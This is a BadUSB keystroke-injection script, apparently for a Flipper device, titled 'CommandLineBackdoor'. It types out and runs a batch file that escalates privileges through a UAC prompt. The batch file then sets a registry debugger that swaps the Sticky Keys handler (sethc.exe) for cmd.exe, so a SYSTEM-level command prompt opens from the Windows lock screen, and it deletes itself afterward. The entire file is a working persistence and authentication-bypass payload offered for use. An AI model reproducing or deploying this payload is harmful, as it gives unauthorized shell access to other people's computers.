Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
1 | | - | REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) |
2 | | - | REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment, |
3 | | - | REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr. |
4 | | - | REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account. |
5 | | - | REM Version: 1.0 |
6 | | - | REM Category: Remote_Access |
7 | | - | REM plug in second USB in before the Flipper |
8 | | - | DELAY 3000 |
9 | | - | CONTROL ESCAPE |
10 | | - | DELAY 500 |
11 | | - | STRING notepad |
12 | | - | DELAY 250 |
13 | | - | ENTER |
14 | | - | DELAY 750 |
15 | | - | STRING @echo off |
16 | | - | ENTER |
17 | | - | STRING :init |
18 | | - | ENTER |
19 | | - | STRING setlocal DisableDelayedExpansion |
20 | | - | ENTER |
21 | | - | STRING set cmdInvoke=1 |
22 | | - | ENTER |
23 | | - | STRING set winSysFolder=System32 |
24 | | - | ENTER |
25 | | - | STRING set "batchPath=%~0" |
26 | | - | ENTER |
27 | | - | STRING for %%k in (%0) do set batchName=%%~nk |
28 | | - | ENTER |
29 | | - | STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs" |
30 | | - | ENTER |
31 | | - | STRING setlocal EnableDelayedExpansion |
32 | | - | ENTER |
33 | | - | STRING :checkPrivileges |
34 | | - | ENTER |
35 | | - | STRING NET FILE 1>NUL 2>NUL |
36 | | - | ENTER |
37 | | - | STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges) |
38 | | - | ENTER |
39 | | - | STRING :getPrivileges |
40 | | - | ENTER |
41 | | - | STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges) |
42 | | - | ENTER |
43 | | - | STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%" |
44 | | - | ENTER |
45 | | - | STRING echo args = "ELEV " >> "%TEMPVBS%" |
46 | | - | ENTER |
47 | | - | STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%" |
48 | | - | ENTER |
49 | | - | STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%" |
50 | | - | ENTER |
51 | | - | STRING echo Next>> "%TEMPVBS%" |
52 | | - | ENTER |
53 | | - | STRING if '%cmdInvoke%'=='1' goto InvokeCmd |
54 | | - | ENTER |
55 | | - | STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%" |
56 | | - | ENTER |
57 | | - | STRING goto ExecElevation |
58 | | - | ENTER |
59 | | - | STRING :InvokeCmd |
60 | | - | ENTER |
61 | | - | STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%" |
62 | | - | ENTER |
63 | | - | STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%" |
64 | | - | ENTER |
65 | | - | STRING :ExecElevation |
66 | | - | ENTER |
67 | | - | STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %* |
68 | | - | ENTER |
69 | | - | STRING exit /B |
70 | | - | ENTER |
71 | | - | STRING :gotPrivileges |
72 | | - | ENTER |
73 | | - | STRING setlocal & cd /d "%~dp0." |
74 | | - | ENTER |
75 | | - | STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1) |
76 | | - | ENTER |
77 | | - | STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end |
78 | | - | ENTER |
79 | | - | STRING cls |
80 | | - | ENTER |
81 | | - | STRING echo Payload Install Failed |
82 | | - | ENTER |
83 | | - | STRING pause |
84 | | - | ENTER |
85 | | - | STRING :end |
86 | | - | ENTER |
87 | | - | STRING del /F /Q "%~0" && exit |
88 | | - | CONTROL s |
89 | | - | DELAY 500 |
90 | | - | STRING %temp%\run.bat |
91 | | - | TAB |
92 | | - | STRING a |
93 | | - | ENTER |
94 | | - | DELAY 250 |
95 | | - | ALT F4 |
96 | | - | DELAY 250 |
97 | | - | CONTROL ESCAPE |
98 | | - | DELAY 500 |
99 | | - | STRING %temp%\run.bat |
100 | | - | ENTER |